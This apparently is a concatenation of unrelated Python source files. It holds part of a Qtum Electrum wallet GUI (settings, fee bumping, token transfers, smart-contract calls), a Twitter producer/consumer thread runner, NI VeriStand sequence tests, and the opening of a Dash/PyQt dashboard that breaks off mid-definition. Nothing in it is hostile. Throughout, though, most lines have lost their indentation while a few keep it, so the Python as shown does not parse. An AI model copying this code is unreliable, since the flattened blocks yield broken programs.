_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet(RED_BG if SSL_error else GREEN_BG if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['QTUM', 'mQTUM', 'bits']
msg = _('Base unit of your wallet.')\
              + '\n1 QTUM = 1000 mQTUM.\n' \
              + _(' These settings affect the fields in the Send tab') + ' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'QTUM':
self.decimal_point = 8
elif unit_result == 'mQTUM':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from qtum_electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0, 1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
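    # Child-Pays-For-Parent: build a child transaction spending the unconfirmed parent's
    # output with a fee large enough (suggested as fee_per_kb * combined size / 1000)
    # to make miners confirm both transactions together.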
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
        grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
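    # Replace-By-Fee bump: the user chooses a higher fee, the positive delta is applied
    # via wallet.bump_fee(), and ticking "Final" clears the RBF flag so the replacement
    # cannot be bumped again.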
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
        vbox.addWidget(QLabel(_('New fee') + ':'))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
                   _("Note: this is an offline transaction; if you want the network "
                     "to see it, you need to broadcast it."))
win.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), msg)
return True
def create_tokens_tab(self):
from .token_list import TokenBalanceList, TokenHistoryList
self.token_balance_list = tbl = TokenBalanceList(self)
self.token_hist_list = thl = TokenHistoryList(self)
splitter = QSplitter(self)
splitter.addWidget(tbl)
splitter.addWidget(thl)
splitter.setOrientation(Qt.Vertical)
return splitter
def set_token(self, token):
"""
:type token: Token
:return:
"""
self.wallet.add_token(token)
self.token_balance_list.update()
self.token_hist_list.update()
def delete_token(self, key):
        if not self.question(_("Remove {} from your list of tokens?").format(
                self.tokens[key].name)):
return False
self.tokens.pop(key)
self.token_balance_list.update()
self.token_hist_list.update()
def token_add_dialog(self):
d = TokenAddDialog(self)
d.show()
def token_view_dialog(self, token):
"""
:type token: Token
"""
d = TokenInfoDialog(self, token)
d.show()
def token_send_dialog(self, token):
"""
:type token: Token
"""
d = TokenSendDialog(self, token)
d.show()
def do_token_pay(self, token, pay_to, amount, gas_limit, gas_price, dialog):
try:
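            # Hand-rolled ABI encoding of an ERC20-style transfer(address,uint256) call:
            # 'a9059cbb' is the 4-byte function selector, followed by the recipient
            # address hex left-padded to 32 bytes and the amount as a 32-byte big-endian integer.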
datahex = 'a9059cbb{}{:064x}'.format(pay_to.zfill(64), amount)
script = contract_script(gas_limit, gas_price, datahex, token.contract_addr, opcodes.OP_CALL)
outputs = [(TYPE_SCRIPT, script, 0), ]
tx_desc = 'pay out {} {}'.format(amount / (10 ** token.decimals), token.symbol)
self._smart_contract_broadcast(outputs, tx_desc, gas_limit * gas_price, token.bind_addr, dialog)
except (BaseException,) as e:
traceback.print_exc(file=sys.stderr)
dialog.show_message(str(e))
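    # Common broadcast path for contract transactions: the gas budget (gas_limit * gas_price)
    # is carved out of the transaction fee, so the confirmation dialog reports the mining fee
    # as fee - gas_fee and the gas fee separately.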
def _smart_contract_broadcast(self, outputs, desc, gas_fee, sender, dialog):
coins = self.get_coins()
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, None,
change_addr=sender,
gas_fee=gas_fee,
sender=sender)
except NotEnoughFunds:
dialog.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
dialog.show_message(str(e))
return
amount = sum(map(lambda y: y[2], outputs))
fee = tx.get_fee()
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
dialog.show_message(
_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
# confirmation dialog
msg = [
_(desc),
_("Mining fee") + ": " + self.format_amount_and_units(fee - gas_fee),
_("Gas fee") + ": " + self.format_amount_and_units(gas_fee),
]
confirm_rate = 2 * self.config.max_fee_rate()
if fee - gas_fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, desc)
self.sign_tx_with_password(tx, sign_done, password)
def set_smart_contract(self, name, address, interface):
"""
:type name: str
:type address: str
:type interface: list
:return: bool
"""
if not is_hash160(address):
self.show_error(_('Invalid Address'))
self.smart_contract_list.update()
return False
self.smart_contracts[address] = (name, interface)
self.smart_contract_list.update()
return True
def delete_samart_contact(self, address):
        if not self.question(_("Remove {} from your list of smart contracts?").format(
                self.smart_contracts[address][0])):
return False
self.smart_contracts.pop(address)
self.smart_contract_list.update()
return True
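    # Read-only contract call: ABI-encode the arguments, query the server's
    # blockchain.contract.call RPC, and decode the returned hex with eth_abi using the
    # output types declared in the ABI entry.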
def call_smart_contract(self, address, abi, args, sender, dialog):
data = eth_abi_encode(abi, args)
try:
result = self.network.synchronous_get(('blockchain.contract.call', [address, data, sender]), timeout=10)
except BaseException as e:
dialog.show_message(str(e))
return
types = list([x['type'] for x in abi.get('outputs', [])])
try:
result = eth_abi.decode_abi(types, binascii.a2b_hex(result))
def decode_x(x):
if isinstance(x, bytes):
try:
return x.decode()
except UnicodeDecodeError:
return str(x)
return str(x)
result = ','.join([decode_x(x) for x in result])
except (BaseException,) as e:
print(e)
pass
if not result:
dialog.show_message('')
return
dialog.show_message(result)
def sendto_smart_contract(self, address, abi, args, gas_limit, gas_price, amount, sender, dialog):
try:
abi_encoded = eth_abi_encode(abi, args)
script = contract_script(gas_limit, gas_price, abi_encoded, address, opcodes.OP_CALL)
outputs = [(TYPE_SCRIPT, script, amount), ]
tx_desc = 'contract sendto {}'.format(self.smart_contracts[address][0])
self._smart_contract_broadcast(outputs, tx_desc, gas_limit * gas_price, sender, dialog)
except (BaseException,) as e:
dialog.show_message(str(e))
def create_smart_contract(self, bytecode, constructor, args, gas_limit, gas_price, sender, dialog):
try:
abi_encoded = ''
if constructor:
abi_encoded = eth_abi_encode(constructor, args)
            script = contract_script(gas_limit, gas_price, bytecode + abi_encoded, None, opcodes.OP_CREATE)  # no target contract address for OP_CREATE
outputs = [(TYPE_SCRIPT, script, 0), ]
self._smart_contract_broadcast(outputs, 'contract create', gas_limit * gas_price, sender, dialog)
except (BaseException,) as e:
dialog.show_message(str(e))
def contract_create_dialog(self):
d = ContractCreateDialog(self)
d.show()
def contract_add_dialog(self):
d = ContractEditDialog(self)
d.show()
def contract_edit_dialog(self, address):
name, interface = self.smart_contracts[address]
contract = {
'name': name,
'interface': interface,
'address': address
}
d = ContractEditDialog(self, contract)
d.show()
def contract_func_dialog(self, address):
name, interface = self.smart_contracts[address]
contract = {
'name': name,
'interface': interface,
'address': address
}
d = ContractFuncDialog(self, contract)
d.show()
|
test_multi_thread_producer_consumer_sql_twitter.py
|
#!/usr/bin/env python
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), "../"))
from multi_thread_producer_consumer_sql_twitter import ProducerConsumerThreadSqlTwitter
from os import path
import threading
APP_ROOT = path.dirname(path.abspath( __file__ ))
"""
Run the SQL-backed Twitter producer/consumer pipeline on two parallel threads.
"""
if __name__ == '__main__':
    # Create one producer thread and one consumer thread and run them concurrently.
producerConsumerThreadSqlTwitter = ProducerConsumerThreadSqlTwitter()
multi_thread_producer_twitter_instance = threading.Thread(target=producerConsumerThreadSqlTwitter.producer_run)
multi_thread_consumer_twitter_instance = threading.Thread(target=producerConsumerThreadSqlTwitter.consumer_run)
multi_thread_producer_twitter_instance.start()
multi_thread_consumer_twitter_instance.start()
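    # Block until both threads finish; non-daemon threads would keep the process alive
    # anyway, but joining makes the intent explicit.
    multi_thread_producer_twitter_instance.join()
    multi_thread_consumer_twitter_instance.join()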
|
test_runpyasrtseq.py
|
import sys
import threading
from niveristand import nivs_rt_sequence
from niveristand import realtimesequencetools
from niveristand.clientapi import DoubleValue, ErrorAction, RealTimeSequence
from niveristand.errors import RunAbortedError, RunFailedError, TranslateError
from niveristand.library import generate_error
from niveristand.library._tasks import get_scheduler
import pytest
from testutilities import validation
@nivs_rt_sequence
def return_var():
a = DoubleValue(5)
return a.value
@nivs_rt_sequence
def _increment(a):
a.value += 1
return a.value
@nivs_rt_sequence
def sub_routine_caller():
a = DoubleValue(5)
_increment(a)
return a.value
@nivs_rt_sequence
def invalid_sequence():
a = DoubleValue(5)
a += 1
return a
@nivs_rt_sequence
def return_void():
a = DoubleValue(5) # noqa: F841 it's ok for this variable to never be used
@nivs_rt_sequence
def generate_error_continue():
generate_error(1, "Continue", ErrorAction.ContinueSequenceExecution)
@nivs_rt_sequence
def generate_error_stop():
generate_error(2, "Stop", ErrorAction.StopSequence)
@nivs_rt_sequence
def generate_error_abort():
generate_error(3, "Abort", ErrorAction.AbortSequence)
run_tests = [
(return_var, (), 5),
(sub_routine_caller, (), 6),
(return_void, (), None),
]
fail_transform_tests = [
(invalid_sequence, (), TranslateError),
(generate_error_continue, (), RunFailedError),
(generate_error_stop, (), RunAbortedError),
(generate_error_abort, (), RunAbortedError),
]
def idfunc(val):
try:
return val.__name__
except AttributeError:
return str(val)
@pytest.mark.parametrize("func_name, params, expected_result", run_tests, ids=idfunc)
def test_run_py_as_rts(func_name, params, expected_result):
actual = realtimesequencetools.run_py_as_rtseq(func_name)
assert actual == expected_result
def test_not_wait_to_complete():
seq = RealTimeSequence(return_var)
result_state = seq.run()
assert result_state.ret_val is None
result_state.wait_for_result()
assert result_state.ret_val == 5
def test_run_multiple_top_level_seqs():
assert len(get_scheduler()._task_dict) == 0
for func, params, expected in run_tests:
actual = realtimesequencetools.run_py_as_rtseq(func)
assert actual == expected
# check that the scheduler is empty after every run.
assert len(get_scheduler()._task_dict) == 0
def test_run_multiple_top_level_seqs_in_parallel():
threads = list()
thread_results = dict()
for func, params, expected in run_tests:
thread_results[func] = expected
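        # Pass func as an explicit thread argument so each helper binds the current loop
        # value rather than closing over the shared variable.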
def run_func_helper(func):
actual = realtimesequencetools.run_py_as_rtseq(func)
thread_results[func] = (thread_results[func], actual)
thread = threading.Thread(target=run_func_helper, name=func.__name__, args=(func,))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for func, results in thread_results.items():
assert results[0] == results[1], "Func: %s failed assert" % func.__name__
@pytest.mark.parametrize("func_name, params, expected_result", fail_transform_tests, ids=idfunc)
def test_failures(func_name, params, expected_result):
with pytest.raises(expected_result):
realtimesequencetools.run_py_as_rtseq(func_name)
def test_check_all_tested():
validation.test_validate(sys.modules[__name__])
|
dashboard.py
|
import io
import base64
import threading
import traceback
import numpy as np
import scipy.io as sio
import pandas as pd
import dash
from dash_table import DataTable
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.exceptions import PreventUpdate
from dash.dependencies import (Input, Output, State)
from PyQt5.QtCore import *
from PyQt5.QtWebEngineWidgets import *
from PyQt5 import QtWebEngineWidgets, QtCore, QtWidgets
from nidmd import Decomposition, Brain, Spectre, TimePlot, Radar
from utils import *
class Dashboard(QWebEngineView):
"""
    Qt web-engine view that builds, serves, and displays the Dash web app.
"""
def __init__(self):
""" Constructor. """
# Call to superclass
super().__init__()
# Display full screen
self.showMaximized()
# Handle download requests for Plotly image saving
QtWebEngineWidgets.QWebEngineProfile.defaultProfile().downloadRequested.connect(
self.on_download_requested
)
# Define local host address
host = dict(address='127.0.0.1', port=8000)
# Initialize decompositions
self.dcp1 = None
self.dcp2 = None
self.match_group = None
self.match_df = None
self.match_x = None
self.match_y = None
self.atlas = None
# Used for cortical surface representation loading
self.progress = 0
# Input data valid and visualization can be launched
self.valid = False
# Display imaginary values in visualization
self.imag = False
# Fetch and add Dash Bootstrap Component theme
self.app = dash.Dash(
external_stylesheets=[dbc.themes.COSMO]
)
# Initialize log file
self.logfile = open(CACHE_DIR.joinpath('log.log').as_posix(), 'r')
# Fetch app layout
self.app.layout = self._get_app_layout()
        # Launch the Dash server on a background daemon thread so it never blocks the Qt event loop
threading.Thread(target=self.run_dash, daemon=True).start()
self.load(QUrl("http://{0}:{1}".format(host['address'], host['port'])))
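    # Download requests from the embedded page (e.g. Plotly image export or table CSV export)
    # arrive here; the MIME type decides between saving an SVG figure and a CSV table.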
@QtCore.pyqtSlot("QWebEngineDownloadItem*")
def on_download_requested(self, download):
# Determine file type
mime_type = download.mimeType()
if mime_type == 'image/svg+xml':
filename = 'nidmd-visualization'
suffix = 'svg'
elif mime_type == 'application/octet-stream':
filename = 'nidmd-data'
suffix = 'csv'
else:
filename = 'some-error'
suffix = ''
path, _ = QtWidgets.QFileDialog.getSaveFileName(
self, "Save File", '.'.join([filename, suffix]), '.'.join(['*', suffix])
)
if path:
download.setPath(path)
download.accept()
def run_dash(self, address='127.0.0.1', port=8000):
"""
        Register the Dash callbacks and run the Dash server.
:param address: [str] address
:param port: [int] port
"""
@self.app.callback(
Output('log', 'children'),
[Input('log-update', 'n_intervals')],
[State('log', 'children')]
)
def update_logs(interval, console):
if console is not None:
for line in self.logfile.read().split('\n'):
console.append(html.Tbody(line))
return console
else:
return None
@self.app.callback([
Output('upload-1-div', 'style'),
Output('upload-2-div', 'style'),
Output('selected-files-group-2-t', 'style'),
Output('selected-files-group-2-p', 'style'),
Output('selected-files-group-1-t', 'children'),
Output('selected-files-group-2-t', 'children'),
Output('upload-1', 'children'),
Output('upload-2', 'children'),
Output('approx-deg-div', 'style')
], [
Input('setting', 'value')
])
def input_setting(value):
""" Modify input setting. """
show = {}
hide = dict(display="none")
style = dict(height="60px", lineHeight="60px", borderWidth="1px", borderStyle="dashed", borderRadius="5px",
textAlign="center", margin="10px", padding="auto", width="90%")
if value is None:
return hide, hide, hide, hide, "Selected files", \
None, None, None, hide
elif value == 1: # Analysis
return style, hide, hide, hide, "Selected files", None, \
html.Div(['Drag and Drop or ', html.A('Select Files')]), None, hide
elif value == 2: # Comparison
return style, style, show, show, "Group 1", "Group 2", \
html.Div(['Group 1: Drag and Drop or ', html.A('Select Files')]), \
html.Div(['Group 2: Drag and Drop or ', html.A('Select Files')]), hide
elif value == 3: # Matching Modes
return style, style, show, show, "Reference Group", "Match Group", \
html.Div(['Reference Group: Drag and Drop or ', html.A('Select Files')]), \
html.Div(['Match Group: Drag and Drop or ', html.A('Select Files')]), show
@self.app.callback([
Output('table-1-tab', 'label'),
Output('table-2-tab', 'label')
], [
Input('setting', 'value')
])
def update_tab_labels(setting):
if setting is None:
raise PreventUpdate
elif setting == 1: # Analysis
return 'Modes', ''
elif setting == 2: # Comparison
return 'Group 1', 'Group 2'
elif setting == 3: # Mode Matching
return 'Reference', 'Match'
@self.app.callback(
Output('help-modal', 'is_open'),
[
Input('help-general', 'n_clicks')
],
[
State('help-modal', 'is_open')
]
)
def toggle_modal_general(n, is_open):
""" Toggle general help modal """
if n:
return not is_open
return is_open
@self.app.callback(
Output('help-modal-selection', 'is_open'),
[
Input('help-selection', 'n_clicks')
], [
State('help-modal-selection', 'is_open')
]
)
def toggle_modal_selection(n, is_open):
""" Toggle selection help modal """
if n:
return not is_open
return is_open
@self.app.callback([
Output('animated-progress-1', 'style'),
Output('animated-progress-2', 'style'),
], [
Input('upload-1', 'contents'),
Input('upload-2', 'contents')
], [
State('setting', 'value')
])
def progress_file(contents1, contents2, setting):
""" Progress bar for file upload. """
if setting is None:
raise PreventUpdate
else:
show = {}
hide = {'display': 'none'}
if setting == 1:
return show if self.dcp1 is None else hide, hide
elif setting == 2:
return show if self.dcp1 is None and contents1 is not None else hide, \
show if self.dcp2 is None and contents2 is not None else hide
elif setting == 3:
return show if self.dcp1 is None and contents1 is not None else hide, \
show if self.match_df is None and contents2 is not None else hide
else:
return hide, hide
@self.app.callback([
Output('selected-files-group-1-p', 'children'),
Output('selected-files-group-2-p', 'children'),
Output('table-1-tab', 'children'),
Output('table-2-tab', 'children'),
Output('table-2-tab', 'disabled'),
Output('animated-progress-1-div', 'style'),
Output('animated-progress-2-div', 'style'),
Output('import-alert', 'children'),
Output('import-alert', 'style'),
], [
Input('upload-1', 'contents'),
Input('upload-2', 'contents'),
Input('sampling-time', 'value')
